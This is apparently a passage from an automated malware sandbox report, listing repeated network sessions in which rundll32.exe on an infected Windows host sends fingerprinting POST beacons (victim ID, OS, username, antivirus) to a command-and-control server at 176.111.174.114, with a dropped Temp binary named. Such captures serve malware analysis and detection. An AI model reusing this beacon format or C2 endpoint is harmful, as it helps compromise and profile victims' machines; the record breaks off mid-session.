                                                                                                                                          119 | 176.111.174.114 | 80 | 192.168.2.4 | 49809 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:28.681278944 CEST | 4818 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:28 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          12 | 192.168.2.4 | 49754 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:11.172408104 CEST | 4527 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          120 | 192.168.2.4 | 49810 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:28.894851923 CEST | 4819 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          121 | 176.111.174.114 | 80 | 192.168.2.4 | 49810 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:28.996047974 CEST | 4819 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:28 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          122 | 192.168.2.4 | 49811 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:29.208331108 CEST | 4820 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          123 | 176.111.174.114 | 80 | 192.168.2.4 | 49811 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:29.310987949 CEST | 4820 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:29 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          124 | 192.168.2.4 | 49812 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:29.517534971 CEST | 4821 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
125 | 176.111.174.114 | 80 | 192.168.2.4 | 49812 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:29.619048119 CEST | 4822 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:29 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
126 | 192.168.2.4 | 49813 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:29.831132889 CEST | 4822 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
127 | 176.111.174.114 | 80 | 192.168.2.4 | 49813 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:29.933906078 CEST | 4823 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:29 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
128 | 192.168.2.4 | 49814 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:30.141639948 CEST | 4823 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
129 | 176.111.174.114 | 80 | 192.168.2.4 | 49814 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:30.243127108 CEST | 4824 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:30 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 176.111.174.114 | 80 | 192.168.2.4 | 49754 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:11.274120092 CEST | 4527 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:11 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
130 | 192.168.2.4 | 49815 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:30.534421921 CEST | 4824 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
131 | 176.111.174.114 | 80 | 192.168.2.4 | 49815 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:30.638287067 CEST | 4825 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:30 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
132 | 192.168.2.4 | 49816 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:30.861617088 CEST | 4826 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
133 | 176.111.174.114 | 80 | 192.168.2.4 | 49816 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:30.965781927 CEST | 4826 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:30 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
134 | 192.168.2.4 | 49817 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:31.171792984 CEST | 4827 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
135 | 176.111.174.114 | 80 | 192.168.2.4 | 49817 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:31.271398067 CEST | 4827 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:31 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
136 | 192.168.2.4 | 49818 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:31.490046024 CEST | 4828 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
137 | 176.111.174.114 | 80 | 192.168.2.4 | 49818 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:31.594208002 CEST | 4828 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:31 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
138 | 192.168.2.4 | 49819 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:31.846139908 CEST | 4829 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          139 | 176.111.174.114 | 80 | 192.168.2.4 | 49819 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:31.947740078 CEST | 4829 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:31 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          14 | 192.168.2.4 | 49755 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:11.480580091 CEST | 4528 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          140 | 192.168.2.4 | 49820 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:32.434592009 CEST | 4830 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          141 | 176.111.174.114 | 80 | 192.168.2.4 | 49820 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:32.536258936 CEST | 4830 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:32 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          142 | 192.168.2.4 | 49821 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:33.193331957 CEST | 4831 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          143 | 176.111.174.114 | 80 | 192.168.2.4 | 49821 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:33.290138006 CEST | 4831 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:33 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          144 | 192.168.2.4 | 49822 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:33.744237900 CEST | 4832 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          145 | 176.111.174.114 | 80 | 192.168.2.4 | 49822 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:33.850231886 CEST | 4832 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:33 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          146 | 192.168.2.4 | 49823 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:35.128179073 CEST | 4833 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          147 | 192.168.2.4 | 49824 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
